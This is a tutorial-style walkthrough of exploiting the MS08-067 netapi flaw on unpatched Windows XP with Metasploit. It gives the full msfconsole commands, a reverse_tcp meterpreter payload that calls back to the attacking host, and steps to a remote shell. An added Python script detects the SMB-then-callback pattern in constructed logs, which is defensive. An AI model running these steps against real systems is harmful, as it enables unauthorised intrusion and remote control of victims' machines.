general example
running an exploit against netapi on a windows xp host
works against UNPATCHED WinXP-SP3 hosts…
# msfconsole
[snipped some info output]
msf > search ms08_067
Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 10.0.my.host
LHOST => 10.0.my.host
msf exploit(ms08_067_netapi) > set RHOST 10.0.victim.host
RHOST => 10.0.victim.host
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.0.my.host:4444
[-] Exploit exception: The connection timed out (10.0.victim.host:445).
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
and as you can see: the host is patched 😉 (strictly speaking, a connection timeout on 445 only shows that SMB was not reachable from the attacking host, e.g. because it is filtered by a firewall; it is not proof that the patch is installed)
explaining the output:
- 1st: start msfconsole
- search for the vulnerability/exploit ms08_067 and get the full path to the exploit
- tell msfconsole to use the exploit
- set the local IP address (attacking host IP): LHOST
- set the remote IP address (victim host): RHOST
- set the payload to send to the victim host: windows/meterpreter/reverse_tcp, which opens a reverse tcp connection back to LHOST
- start exploiting: exploit
if the exploit was successful, you will get a prompt like this:
meterpreter>
meterpreter> shell
[snipped output of starting windows cmd]
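As an added defender-side illustration (not part of the original notes): the exploit above talks to TCP/445 on RHOST, and the reverse_tcp payload then calls back to LHOST on port 4444. Seen from the victim, that is "inbound connection to 445 from X, shortly followed by a new outbound connection to X", which is the pattern this script flags. The log format, field names and sample lines are constructed for this example, not taken from any real firewall product.

```python
"""Flag the SMB-in / reverse-TCP-out pattern in connection logs.

Constructed log format (one event per line):
    <ISO time> <IN|OUT> <proto> <src_ip> <src_port> <dst_ip> <dst_port>
Lines are written from the monitored host's point of view.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SMB_PORT = 445
WINDOW = timedelta(seconds=60)  # callback must follow the SMB hit within this

# Constructed sample: 10.0.0.20 is the monitored host. The first pair is the
# exploit-then-callback pattern; the second pair is ordinary traffic 15 min apart.
SAMPLE_LOG = """\
2024-01-01T10:00:01 IN  TCP 10.0.0.5 51200 10.0.0.20 445
2024-01-01T10:00:02 OUT TCP 10.0.0.20 49321 10.0.0.5 4444
2024-01-01T10:05:00 IN  TCP 10.0.0.7 51300 10.0.0.20 445
2024-01-01T10:20:00 OUT TCP 10.0.0.20 49400 10.0.0.7 443
"""


def parse_line(line):
    ts, direction, proto, src, sport, dst, dport = line.split()
    return {"ts": datetime.fromisoformat(ts), "dir": direction, "proto": proto,
            "src": src, "sport": int(sport), "dst": dst, "dport": int(dport)}


def find_reverse_shell_candidates(log_text, window=WINDOW):
    """Return (peer_ip, smb_time, callback_time, callback_port) for every
    outbound TCP connection to a peer that hit our SMB port within `window`
    before it. The callback port is reported, not matched, because LPORT is
    attacker-chosen (4444 is only the default)."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    smb_hits = defaultdict(list)  # peer ip -> times it connected to TCP/445
    for e in events:
        if e["dir"] == "IN" and e["proto"] == "TCP" and e["dport"] == SMB_PORT:
            smb_hits[e["src"]].append(e["ts"])
    candidates = []
    for e in events:
        if e["dir"] != "OUT" or e["proto"] != "TCP":
            continue
        for t in smb_hits.get(e["dst"], []):
            if timedelta(0) <= e["ts"] - t <= window:
                candidates.append((e["dst"], t, e["ts"], e["dport"]))
    return candidates


if __name__ == "__main__":
    for peer, smb_t, cb_t, port in find_reverse_shell_candidates(SAMPLE_LOG):
        print(f"ALERT: {peer} hit 445 at {smb_t}, callback to {peer}:{port} at {cb_t}")
```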
useful commands
some useful commands…
search for a specific exploit
search ms08_067
show available exploits
show exploits
show all payloads
show payloads
show info about an exploit
info exploit exploit/windows/smb/ms08_067_netapi
show info about a payload
info payload windows/meterpreter/reverse_tcp
show options
if an exploit and/or payload is already set, it displays their options:
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) >